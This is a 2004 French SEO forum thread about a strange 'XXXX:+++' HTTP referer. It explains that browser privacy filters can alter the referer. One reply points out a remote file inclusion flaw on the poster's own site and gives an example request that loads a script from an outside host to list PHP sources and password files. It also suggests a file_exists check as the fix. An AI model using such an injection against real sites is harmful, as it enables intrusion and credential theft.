provenance XXXX:++++++++++++++++
12 messages • Page 1 sur 1
Consultez la formation au référencement naturel Google de WebRankInfo / Ranking Metrics
provenance XXXX:++++++++++++++++
le Dim Jan 25, 2004 13:35
Bonjour,
Depuis une semaine , j'ai vu arriver 2 fois sur la page d'acceuil de mon site un internaute dont l'http referer est "XXXX:++++++++++++++++" au lieu de l'habituel http ://www . site . com/sdfjkl
j'ai bien fait ma recherche dans webrankinfo comme un bon petit gars qui commence à comprendre comment ça se passe mais je n'ai pas trouvé, peut être avez vous déjà vu ça?
Depuis une semaine , j'ai vu arriver 2 fois sur la page d'acceuil de mon site un internaute dont l'http referer est "XXXX:++++++++++++++++" au lieu de l'habituel http ://www . site . com/sdfjkl
j'ai bien fait ma recherche dans webrankinfo comme un bon petit gars qui commence à comprendre comment ça se passe mais je n'ai pas trouvé, peut être avez vous déjà vu ça?
le Dim Jan 25, 2004 14:37
ou un bots developpé a la carte
parce que te hacker pas spécialement dur :
http://www.observatoire-environnement.o ... l=toto.htm
avec cette faille on peux lister tes sources php et autre fichiers de passwords
parce que te hacker pas spécialement dur :
http://www.observatoire-environnement.o ... l=toto.htm
avec cette faille on peux lister tes sources php et autre fichiers de passwords
le Dim Jan 25, 2004 15:49
ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple
suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password
suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password
Re: provenance XXXX:++++++++++++++++
le Dim Jan 25, 2004 15:49
Bonjour,sietjp a écrit:peut être avez vous déjà vu ça?
oui certains internautes utilisent un filtre Web qui mouline tout ce qui entre et sort de leur navigateur (variable HTTP, javascript, cookies).
Dans ce cas c'est le referer qui est remplacé par n'importe quoi. Ca ne sert à rien à part gêner le suivi d'audience des webmestres. C'est de la paranoïa pure et simple.
le Dim Jan 25, 2004 15:59
fredsoft a écrit:ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple
suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password
non car les chaines de caractères sont validées, et même en essayant des commandes simples, ça bloque . je connaissais cette combine. Mais peut être en as tu une de spéciale?
le Dim Jan 25, 2004 16:23
je pense pas que tu connaisses la combine sinon tu aurais fait la parade gloable la plus simple pour ce genre de faille le test file_exists. J'ai pas testé plus sinon..donc je n'affirme rien...juste qu'il y une possibilité
12 messages • Page 1 sur 1
Formation recommandée sur ce thème :
Formation Référencement naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Configurer des nouveaux moteurs dans Google Analytics
- Pas de referrers Windows Live Search
- 1ère faille de sécurité découverte sur Google Chrome
- Google achète Measure Map
- MyMaps : des cartes personnalisées avec Google Maps
- Aux USA, Gmail dépasse YouTube en nombre de visiteurs
- Google WebQuotes
- Liens sponsorisés : XiTi mesure Google Content
- SearchMonkey : Yahoo ouvre sa plateforme de recherche
- Google ouvre un weblog pour mieux communiquer
- Référants : XXXX:++++++++++++++++++
- le .php?id=xxxx Incidence sur le PR
- Pourquoi un site xxxx.monsite.wanadoo.fr trés bonne position
- Probleme variable php '.xxxx.' dans autre variable '.zzzz.'
- Provenance visiteurs
- Du contenu en provenance d'ailleurs
- Sondage : provenance du trafic
- Provenance des visiteurs ??
- Virement de provenance inconnu
- Provenance étrange de visiteurs
- YAhoo et Msn, aucune provenance
- Plus de visiteurs en provenance des moteurs...
- Stats Adsense en provenance d'Adwords ?
- Presque plus traffic en provenance de google ???
- Interdire l'acces selon la provenance
Consultez la description détaillée des produits ou services de Google suivants : Google WebQuotes, Google Measure Map
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités
- Index du forum
- L’équipe du forum • Supprimer les cookies du forum • Heures au format UTC + 1 heure
- Flux RSS de WebRankInfo :
le forum- les articles des dossiers
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
, traduction par phpBB-fr.com, mod SEO par phpbb-seo.com
Contact
Confidentialité